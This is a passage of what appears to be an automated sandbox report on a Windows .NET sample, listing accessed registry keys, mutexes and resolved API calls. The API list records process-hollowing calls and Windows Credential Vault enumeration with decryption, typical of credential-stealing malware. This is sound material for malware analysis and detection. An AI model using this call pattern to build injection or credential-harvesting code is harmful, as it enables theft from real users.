HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ADAPDelay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LodCtrDelay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\TimeToFullDredge
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\TimeToTerminateAdap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastFullDredgeTimestamp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\AECFFC7E
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaxSxSHashCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit
HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\wmi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\wmi
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CMF\Config\SYSTEM

Write Keys

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\cval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DiskDiagnostics\DFDCollectorInvokeTimes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\AdaptiveSqm\ManifestInfo\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastRunTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastEventTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PreviousServiceShutdown
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ProcessID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ThrottleDrege
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2\SCM Event Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\IDE\DiskVBOX_HARDDISK___________________________1.0_____\5&33d1638a&0&0.0.0_0-{05901221-D566-11d1-B2F0-00A0C9062910}

Delete Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\WMIBinaryMofResource.HighDateTime=30016556,LowDateTime=1652017424,Name="C:\Windows\system32\advapi32.dll[MofResourceName]"

Mutexes

Global\CLR_CASOFF_MUTEX
D448845E628773E4A9A809DA
Global\SQMWindowsConsolidator
Global\ADAP_WMI_ENTRY
Global\RefreshRA_Mutex
Global\RefreshRA_Mutex_Lib
Global\RefreshRA_Mutex_Flag

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
kernel32.dll.VirtualProtect
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SwitchToThread
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.DebugActiveProcess
kernel32.dll.WaitForDebugEvent
kernel32.dll.ContinueDebugEvent
kernel32.dll.DeleteFileA
advapi32.dll.SetKernelObjectSecurity
advapi32.dll.GetKernelObjectSecurity
ntdll.dll.NtSetInformationProcess
ntdll.dll.NtProtectVirtualMemory
kernel32.dll.VirtualAllocEx
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.WriteProcessMemory
kernel32.dll.ReadProcessMemory
kernel32.dll.TerminateProcess
kernel32.dll.CreateProcessW
ole32.dll.CoUninitialize
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptReleaseContext
vaultcli.dll.VaultEnumerateItems
vaultcli.dll.VaultEnumerateVaults
vaultcli.dll.VaultFree
vaultcli.dll.VaultGetItem
vaultcli.dll.VaultOpenVault
vaultcli.dll.VaultCloseVault
sechost.dll.LookupAccountSidLocalW
netapi32.dll.NetUserGetInfo
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptSetKeyParam
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptDestroyKey
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
dwmapi.dll.DwmIsCompositionEnabled
rpcrt4.dll.UuidFromStringW
radarrs.dll.WdiDiagnosticModuleMain
radarrs.dll.WdiHandleInstance
radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion
ole32.dll.CoInitializeSecurity
ole32.dll.CoCreateInstance
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
fntcache.dll.ServiceMain
fntcache.dll.SvchostPushServiceGlobals
ntmarta.dll.GetMartaExtensionInterface
wkscli.dll.NetGetJoinInformation
netutils.dll.NetApiBufferFree
userenv.dll.UnregisterGPNotification
gpapi.dll.UnregisterGPNotificationInternal
ole32.dll.CoDisconnectContext
dfdts.dll.DfdGetDefaultPolicyAndSMART
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.QueryServiceStatus
sechost.dll.CloseServiceHandle
sspicli.dll.GetUserNameExW
pcwum.dll.PerfDeleteInstance
pcwum.dll.PerfStopProvider
propsys.dll.PropVariantToVariant
ole32.dll.CoDisconnectObject
wbemcore.dll.Shutdown
ole32.dll.CoReleaseMarshalData
kernel32.dll.RegDeleteValueW
oleaut32.dll.#9
kernel32.dll.GetThreadPreferredUILanguages
kernel32.dll.SetThreadPreferredUILanguages
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetSystemDefaultLocaleName
fastprox.dll.DllGetClassObject
fastprox.dll.DllCanUnloadNow
kernel32.dll.RegOpenKeyExW
psapi.dll.EnumProcesses
wmisvc.dll.ServiceMain
cryptsp.dll.CryptGenRandom
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
ole32.dll.DcomChannelSetHResult
vssapi.dll.CreateWriter
oleaut32.dll.#6
oleaut32.dll.#2
advapi32.dll.LookupAccountNameW
samcli.dll.NetLocalGroupGetMembers
samlib.dll.SamConnect
rpcrt4.dll.NdrClientCall3
rpcrt4.dll.RpcStringBindingComposeW
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcStringFreeW
rpcrt4.dll.RpcBindingFree
samlib.dll.SamOpenDomain
samlib.dll.SamLookupNamesInDomain
samlib.dll.SamOpenAlias
samlib.dll.SamFreeMemory
samlib.dll.SamCloseHandle
samlib.dll.SamGetMembersInAlias
samlib.dll.SamEnumerateDomainsInSamServer
samlib.dll.SamLookupDomainInSamServer
ole32.dll.CoCreateGuid
ole32.dll.StringFromCLSID
oleaut32.dll.#4
oleaut32.dll.#7
propsys.dll.VariantToPropVariant
wbemcore.dll.Reinitialize
wbemsvc.dll.DllGetClassObject
wbemsvc.dll.DllCanUnloadNow
authz.dll.AuthzInitializeContextFromToken
authz.dll.AuthzInitializeObjectAccessAuditEvent2
authz.dll.AuthzAccessCheck
authz.dll.AuthzFreeAuditEvent
authz.dll.AuthzFreeContext
authz.dll.AuthzInitializeResourceManager
authz.dll.AuthzFreeResourceManager
rpcrt4.dll.RpcBindingCreateW
rpcrt4.dll.RpcBindingBind
rpcrt4.dll.I_RpcMapWin32Status
advapi32.dll.EventWrite
advapi32.dll.EventActivityIdControl
advapi32.dll.EventWriteTransfer
advapi32.dll.EventEnabled
kernel32.dll.RegCloseKey
kernel32.dll.RegSetValueExW
kernel32.dll.RegQueryValueExW
wmisvc.dll.IsImproperShutdownDetected
wevtapi.dll.EvtRender
wevtapi.dll.EvtNext
wevtapi.dll.EvtClose
wevtapi.dll.EvtQuery
wevtapi.dll.EvtCreateRenderContext
rpcrt4.dll.RpcBindingSetAuthInfoExW
